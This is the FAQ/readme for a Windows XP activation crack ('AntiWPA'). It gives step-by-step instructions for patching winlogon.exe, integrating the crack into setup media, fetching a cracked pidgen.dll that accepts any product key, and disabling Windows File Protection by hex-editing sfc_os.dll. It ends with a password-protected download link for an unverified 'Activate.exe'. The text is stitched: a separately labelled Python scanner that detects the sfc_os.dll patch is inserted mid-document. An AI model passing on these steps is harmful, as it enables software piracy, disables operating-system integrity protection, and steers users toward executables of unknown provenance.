Note: The patch doesn't 'activate' Windows; it only removes the check in winlogon.exe
that tests whether Windows is activated or still in the evaluation period
and forces you to log off if something is wrong.
When you install a service pack, winlogon.exe is normally overwritten by a new,
unpatched version, so you need to reapply the patch.
Usually the service pack resets the trial counter, so it will restart at 30 days.
--------------------------------------------------------------------------------
I can't start the patch because my evaluation period expired and
now I'm unable to log in.
--------------------------------------------------------------------------------
You can still log in in safe mode even if your evaluation period has expired.
Press F8 right after the BIOS boot screen and select the Safe Mode
(without network support) menu entry. Windows should now boot in safe mode and you can
log in and apply the Anti-WPA-Patch.
Note: Since no network support is available in safe mode, no Internet or network
is available, so it's good to have the patch somewhere on the hard disk or on a
floppy disk.
If you select Safe Mode (with network support), you are unable to log in because
activation is necessary.
--------------------------------------------------------------------------------
I want to change my CD-Key - but msoobe.exe also says
'Already Activated' and doesn't show the Activation Dialog
--------------------------------------------------------------------------------
Enable option 'Apply OOBE Fix' and
disable option 'Apply WPA Fix' (to keep the WPA-Patch active),
then click on the 'Restore Backup' button.
PREVIOUS VERSIONS:
Start regedit and go to
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents\[OOBETimer]
Edit this and set the last byte to FF.
Start this (if the Activation is deleted) to show the Activation dialog:
%SYSTEMROOT%\system32\oobe\msoobe.exe /A
--------------------------------------------------------------------------------
Is it possible to integrate WPA_KILL.EXE in the WinXP setup-routine?
I have a WinXP pro setup CD (sp2 integrated).
--------------------------------------------------------------------------------
Integrating the AntiWPA Patch in the Windows Setup:
1. Extract [WindowsSetupDir]\i386\winlogon.ex_ to a temporary dir.
(Winrar or winace will do the job, or rename it to winlogon.cab and
double-click on it to use the built-in WindowsCabExtract)
2. Apply the WPA Crack to the file.
Right click on 'Apply/Browse' and choose the file.
(To unlock all buttons of the WPA-Patch right click on 'Quit')
3. Repack winlogon.exe and put it back in the installation folder.
Use Winace (choose MS-Cab as compression method) and name
the packed cab file winlogon.ex_.
Or use makecab.exe (included in Windows XP): start cmd.exe in the dir
winlogon.exe is in and enter:
makecab winlogon.exe
After that you will get winlogon.ex_ as output.
PREVIOUS VERSIONS:
In previous versions the PE Checksum of the file wasn't updated by the patch.
This caused setup to reject winlogon.exe during installation.
But this has been fixed in this version.
Manual OOBE_Fix for WindowsSetup
----------------------------------
Since I see that the people integrating the patched winlogon.exe into Windows setup are
perfectionists, here's a hint on how you may get rid of the activation links in
the start menu (-untested-):
Ok, unpack and edit syssetup.inf
1. Search for
[StartMenuCommon]
and delete this to avoid the activate link in START
%oobe_desc% = oobe\msoobe.exe,"%%SYSTEMROOT%%\system32\oobe\msoobe.exe /A",,0,"@%SystemRoot%\system32\oobe\msoobe.exe,-2001","%SystemRoot%\system32\oobe\msoobe.exe",2000
(btw you can also delete the useless %windowscatalog% link section if you like)
2. In SystemTools it's the same
[SystemTools]
%oobe_desc% = oobe\msoobe.ex...
For a better understanding of the inf-file format: at the end of the file, the variable "oobe_desc" is defined:
oobe_desc = "Windows aktivieren"
This was where I first stepped when I searched for "Windows aktivieren" in C:\windows
The second step was to look for oobe_desc...
No-CDKey-Patch for WindowsSetup
-------------------------------
- Since I got some positive feedback about this I decided to publish this.
But so far I haven't tested it myself -
This will make the WindowsSetup accept any CDKey, even a blank one.
Get "http://antiwpa.cjb.net/Other/cracked pidgen for setup.rar"
Pack pidgen.dll with cab-pack to pidgen.dl_ as described above
and put it in the I386 setupdir.
That's it.
--------------------------------------------------------------------------------
What changes does this patch make to my system and how do I undo them?
--------------------------------------------------------------------------------
1. It modifies c:\WINDOWS\system32\Winlogon.exe and creates a
backup named Winlogon.bak
UNDO: Rename Winlogon.exe -> Winlogon.OUT
Rename Winlogon.bak -> Winlogon.exe
After Reboot you will be able to delete Winlogon.OUT if you like
2. The RegistryValue
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents\[OOBETimer]
is set to a fixed value, as if it were activated.
UNDO: Edit this with Regedit and set Last Byte to FF.
This will 'DeActivate' Windows
Note: Normally this value is written (not read!) by winlogon.exe on
every start up just as information for MSOOBE.
This value has no effect on the real Activation.
3. The 'Activate Windows' link is removed from the start menu
UNDO: Start\Execute:
rundll32 setupapi,InstallHinfSection RESTORE_OOBE_ACTIVATE 132 syssetup.inf
Other Changes:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
"SourcePath" and "ServicePackSourcePath" will be temporarily deleted during the patch
and (if nothing really bad happens) restored when it's finished.
--------------------------------------------------------------------------------
How to set another path to Winlogon.exe?
--------------------------------------------------------------------------------
Right click on the 'Apply/Browse' button.
If the patch is already applied and the 'Apply/Browse' button is greyed out,
right click on the 'Quit' button to force unlock all buttons.
Note: You can also use the Windows Anti WPA Patch to de-protect
(Remove SelfCheckBlock SCB) from other protected
Microsoft exe and dll's:
For ex: licdll.dll, DPCDLL.dll or Windows PLUS! Pack Executables
Of course the WPA-Patch is skipped in this case.
--------------------------------------------------------------------------------
The Patch doesn't work after I rebooted, the WPA Reminder pops up again.
Also during the Patch the Windows Systemfile Protection Dialogbox didn't
come up.
--------------------------------------------------------------------------------
Maybe the Patch was undone by the Windows File Protection.
To check if the patch is still active start the Windows Anti WPA Patch again and check if it says 'Patch already applied'.
--------------------------------------------------------------------------------
How to disable this damn Windows File Protection (WFP)?
--------------------------------------------------------------------------------
There is no really official way to disable this.
This is an undocumented setting that worked for recent Windows versions:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SFCDisable=0xffffff9d
BUT: It was removed in Windows 2000 Service Pack 2 and in Windows XP!
When you restart your computer, the System event log will contain Event ID 64032, "Windows File Protection is not active on this system."
SFCDisable (REG_DWORD)
0 = enabled (default - WinXP Professional)
1 = disabled, prompt at boot to re-enable - Requires a kernel debugger to be hooked up or this will be ignored!
2 = disabled at next boot only, no prompt to re-enable - Requires a kernel debugger to be hooked up or this will be ignored!
4 = enabled, with popups disabled (default - for all Server Windows)
More about this and how to re-enable the 'SFCDisable=0xffffff9d-setting'
-> http://www.collakesoftware.com/aboutwfp.htm
To make this more flexible here is a search'n'replace patch:
(Rename sfc_os.dll to sfc_os.OUT; copy sfc_os.OUT to sfc_os.dll)
Open sfc_os.dll in a hex editor
Search for  : 83 f8 9D 75 08 33 C0 40
Replace with: 83 f8 9D EB 08 33 C0 40
So this is where it comes from:
             A1 D8E1C376   MOV EAX, [SFCDisable]
Patch-  >    83F8 9D       CMP EAX, -63   ; = 0xffffff9d !
Search  >    75 08         JNZ SHORT Don't_Set_SFCDisable_=_1
Data    >    33C0          XOR EAX, EAX
        >    40            INC EAX
             A3 D8E1C376   MOV [SFCDisable], EAX
:Don't_Set_SFCDisable
Btw this fragment is the reason 0xffffff9d doesn't work anymore - so alternatively Nop Out (=overwrite with 0x90) that bastard
Well, I found a really simple way to disable this for sure:
Rename c:\WINDOWS\system32\sfc.dll to sfc-OUT.dll or something else.
After a reboot the WFP is disabled.
BUT I advise renaming sfc-OUT.dll back to sfc.dll soon, because I noticed
that you can't install any new hardware device driver: syssetup.dll
statically imports sfc.dll and fails to load if sfc.dll is not found.
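Added example (not part of the original readme or of the tool): a defender-side check that scans a copy of sfc_os.dll for the byte signature quoted above and reports whether the conditional branch is the shipped `75 08` or has been altered. The function names and the sample buffers are constructed for illustration, and the signature is specific to the build the readme describes.

```python
from __future__ import annotations
import sys

# Byte signature quoted on the page for sfc_os.dll:
#   83 F8 9D   CMP EAX, -63        (0xffffff9d)
#   ?? 08      short branch with an 8-byte displacement
#   33 C0 40   XOR EAX, EAX / INC EAX
PREFIX = bytes.fromhex("83f89d")
SUFFIX = bytes.fromhex("0833c040")
BRANCH = {0x75: "original", 0xEB: "patched"}  # JNZ SHORT vs. JMP SHORT


def scan_sfc_os(data: bytes) -> list[tuple[int, str]]:
    """Return (offset, state) for every occurrence of the signature.

    The branch opcode is treated as a wildcard, so a file whose branch was
    rewritten to something other than JMP is still reported ("modified").
    """
    hits = []
    pos = data.find(PREFIX)
    while pos != -1:
        opcode_at = pos + len(PREFIX)
        tail = data[opcode_at + 1 : opcode_at + 1 + len(SUFFIX)]
        if tail == SUFFIX:
            hits.append((pos, BRANCH.get(data[opcode_at], "modified")))
        pos = data.find(PREFIX, pos + 1)
    return hits


def verdict(data: bytes) -> str:
    """Summarise a scan: any non-original branch marks the file as tampered."""
    states = {state for _, state in scan_sfc_os(data)}
    if not states:
        return "signature-absent"  # other build, or the fragment was overwritten
    return "branch-intact" if states == {"original"} else "tampered"


def sample(opcode: int) -> bytes:
    """Constructed test buffer (not real DLL contents) around the signature."""
    return b"\x00" * 16 + PREFIX + bytes([opcode]) + SUFFIX + b"\xcc" * 8


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
        print(sys.argv[1], verdict(blob), scan_sfc_os(blob))
    else:
        for op in (0x75, 0xEB, 0x74):
            print(hex(op), verdict(sample(op)))
```

A "signature-absent" result on a real file only means this build does not contain the quoted bytes; confirm integrity by comparing the file hash with a known-good copy from matching installation media.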
--------------------------------------------------------------------------------
The Patcher doesn't find any offset. / Known problem on Asian systems.
--------------------------------------------------------------------------------
WPA_KILL.EXE currently doesn't work with Asian Systems (
enabled. If you have such a system, disable DBCS, or patch your winlogon.exe on a non-DBCS system:
apply the patch and copy it back to your system.
As far as I found out, the Test Version function does not work properly and you get 'unknown Version'.
A workaround that might work is to use the offset locator to detect/set the right offset manually.
(Hint: Compare the detected offset with the known-offset-list)
The problem is related to some improper char handling and/or comparing inside FrmMain.Test(), i.e. FileStream::FixedString()
Everyone who has an Asian system and MSOffice (Note: VBA is always installed together with MSO) or Visual Basic 6 is welcome to invite me to a remote session, so I can examine and fix that problem. Please send me an email...
And of course you're also welcome to fix it yourself:
\other\cracknfo\problem-onasian-systems.rar
\SRC\antiwpa-1.6.2-winxp-2k3-src.zip
--------------------------------------------------------------------------------
How do you access/modify the winlogon.exe file while the winlogon process is running?
I only saw you are using standard API calls but I must have missed something...
--------------------------------------------------------------------------------
How to modify a file (like winlogon.exe) while it is in use:
1. Rename winlogon.exe -> winlogon.bak
That's the most important thing about it. You can't delete or
modify a file that's in use, but you can RENAME it! (Under Win9x
this doesn't work. But there you can rename the dir the file is in...)
2. Copy winlogon.bak -> winlogon.exe
3. Now you can edit winlogon.exe. Of course you can't delete (or
modify) winlogon.bak as long as it is in use.
But you surely want to keep a backup of it, don't you?
Oh, I almost forgot to mention another annoying thing:
>The Windows system File Protection (WFP) 'D:\installs\WinXP_SP2.out'
So the WFP won't find them to restore
Well, the WPA-Patch doesn't rename your Windows installation path; it temporarily deletes the path to it in your registry and restores it after the patch (actually after you click on the OK button of the messagebox).
These Registry paths are:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
"SourcePath"= "D:\installs\WinXP_CD"
"ServicePackSourcePath" ="D:\installs\WinXP_SP2"
----------------------------------------------------------
Just a hint to see if the patch worked without rebooting:
1. Apply the patch
2. Log on as another user
(But don't log off - choose change/disconnect user)
3. When you log in just see if the patch works...
... or if not, you get this damn
'You haven't activated your Windows yet...' message
(4. If you log off the first user now, 'winlogon.bak' is no longer in use
and you can delete/modify it)
Ah, and to get a better overview of the processes which are running on your machine use this: http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
And next time you can't delete a file, use 'search handle' and enter the filename, then close the handle (=file) or kill the process...
--------------------------------------------------------------------------------
Does the AntiWPA Crack make winlogon.exe unstable?
--------------------------------------------------------------------------------
Since the WPA 1.6.2 disables all anti crack self checks in winlogon.exe it may execute some msec faster :)
The patch simply makes winlogon.exe skip the function which does the WPA check (update of WPA Trialcounter)
and blocks any login if the result is 'negative'.
From 'outside' this Windows is simply not activated, but as long as you're using a valid CDKEY, Windows Update will work and is not affected by the WPA-Patch.
> does the patch make winlogon.exe unstable?
No. If it is applied correctly winlogon.exe will not become unstable/crash.
(The only time winlogon.exe becomes unstable is after applying wpa-kill 1.1 to WinXP SP1 - but this bug was fixed in version 1.2...)
Of course, with the wrong offset in the offset locator you can make winlogon.exe unstable/crash, or by killing the patcher while the patch is being applied.
--------------------------------------------------------------------------------
PREVIOUS VERSIONS:
I got 'ERROR: Unknown Version of winlogon.exe'.
Can you include this version in your WPA-Patcher ?
--------------------------------------------------------------------------------
Well, please try the offset locator button to patch this new version. Since version 1.4 the offset locator has a heuristic search which should find the right offset by default and highlight it.
So, after you have read the warning, just double click on the highlighted offset in the list to set it as the new patch offset.
If this is not a Beta or Release Candidate version, send me your -unpatched- Winlogon.exe by email and add whether the default offset (found by the offset locator) works.
--------------------------------------------------------------------------------
PREVIOUS VERSIONS:
The patch doesn't work - if I click on the 'Activate Windows' link in the
start menu, it says Windows isn't activated and that there are only xx days left.
--------------------------------------------------------------------------------
This patch doesn't stop the trial counter, nor will it 'activate' your Windows.
The WPA-Patch fixes the conditional jump which decides whether Windows was started in safe mode
and the activation check should be skipped, or whether it was started in normal mode and the check should be done.
So in short it will make winlogon.exe skip the is-Windows-activated check when you log on.
To see if the patch works, wait about one minute after you log on -
if the Activation reminder balloon in the tray bar DOESN'T pop up - the patch IS working.
Some other things that show it works:
The messagebox that reminds you to activate if there are only 5 days left and
the messagebox that says you're not allowed to log on until you activate will be gone.
So patching msobmain.dll just to make it say it's activated is only additional overhead and
may also cause some problems. Maybe if you want to change your CDKey and you don't reach the CDKEY change dialog because it says already activated...
Ok, what I need to do is to include some FAQ-info text in the next version about that issue.
Maybe I will add a "Let's Activate Windows" force true patch if there is such a big need for this.
I mean, if this makes someone sleep better at night, that is a good enough reason.
http://Antiwpa.cjb.net
XP Activation
Installation:
Run "Activate.exe". Wait until the window says:
"Already Activated" or something... don't close it.
Now run "Enable Updates.exe". Wait until it is fixed.
Now close all windows, and restart your PC.
DOWNLOAD
http://rapidshare.com/files/16707564/x_h_by_kissme1.rar.html
PASSWORD : kissme1